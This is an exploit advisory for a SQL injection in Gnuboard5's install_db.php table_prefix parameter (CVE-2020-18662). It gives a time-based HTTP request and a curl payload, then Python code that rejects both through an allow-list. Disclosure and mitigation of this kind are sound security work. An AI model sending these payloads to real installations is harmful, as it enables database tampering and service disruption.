# Exploit Title: Gnuboard5 <= 5.3.2.8 SQL Injection via table_prefix Parameter
# Date: 2024-10-26
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/gnuboard/gnuboard5
# Software Link: https://github.com/gnuboard/gnuboard5
# Version: 5.3.2.8
# Tested on: Ubuntu, Windows
# CVE: CVE-2020-18662

PoC:

1) Time-based payload in table_prefix:

POST /install/install_db.php HTTP/1.1
Host: gnuboard
Content-Type: application/x-www-form-urlencoded
Content-Length: 100

mysql_user=root&mysql_pass=password&mysql_db=gnuboard&table_prefix=12`; select sleep(5)#

Result: the response is delayed by 5 seconds.

2) Same request sent with curl:

curl -X POST http://gnuboard/install/install_db.php \
  -d "mysql_user=root" \
  -d "mysql_pass=password" \
  -d "mysql_db=gnuboard_db" \
  -d "table_prefix=' OR 1=1--"

Result: the application stops working.

[Replace the domain name and the database information with your own.]
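The parameter abused above is a table-name fragment, so the defensive fix is an allow-list check on it before any SQL text is assembled. The following is an added example, not code from the advisory or from Gnuboard: it parses form bodies shaped like the requests above and rejects any table_prefix outside `[A-Za-z0-9_]`. The sample bodies, function names and regex are constructed for this illustration.

```python
"""Allow-list validation of the install_db.php table_prefix parameter.

Added example (not Gnuboard code): shows how the two payloads in the
advisory are rejected before they could reach a CREATE TABLE statement.
"""
import re
from urllib.parse import parse_qs

# A table prefix only needs letters, digits and underscores; backticks,
# quotes, semicolons and comment markers have no legitimate use here.
PREFIX_RE = re.compile(r"^[A-Za-z0-9_]+$")


def valid_table_prefix(value: str) -> bool:
    """Return True only for a prefix safe to embed as part of an identifier."""
    return PREFIX_RE.fullmatch(value) is not None


def check_install_request(body: str) -> dict:
    """Parse a form-encoded install_db.php body and classify table_prefix.

    Returns {'prefix': str | None, 'ok': bool, 'reason': str}.
    """
    fields = parse_qs(body, keep_blank_values=True)
    prefix = fields.get("table_prefix", [None])[0]
    if prefix is None:
        return {"prefix": None, "ok": False, "reason": "missing table_prefix"}
    if not valid_table_prefix(prefix):
        return {"prefix": prefix, "ok": False,
                "reason": "table_prefix contains characters outside [A-Za-z0-9_]"}
    return {"prefix": prefix, "ok": True, "reason": "accepted"}


# Constructed sample bodies: one benign install plus the advisory's two
# payloads, percent-encoded as a browser or curl would send them.
SAMPLE_BODIES = [
    "mysql_user=root&mysql_pass=password&mysql_db=gnuboard&table_prefix=g5_",
    "mysql_user=root&mysql_pass=password&mysql_db=gnuboard"
    "&table_prefix=12%60%3B+select+sleep(5)%23",
    "mysql_user=root&mysql_pass=password&mysql_db=gnuboard_db"
    "&table_prefix=%27+OR+1%3D1--",
]


def audit(bodies=SAMPLE_BODIES) -> list:
    """Classify every sample body; used by the demo below and by tests."""
    return [check_install_request(b) for b in bodies]


if __name__ == "__main__":
    for r in audit():
        verdict = "ACCEPT" if r["ok"] else "REJECT"
        print(verdict, repr(r["prefix"]), "-", r["reason"])
```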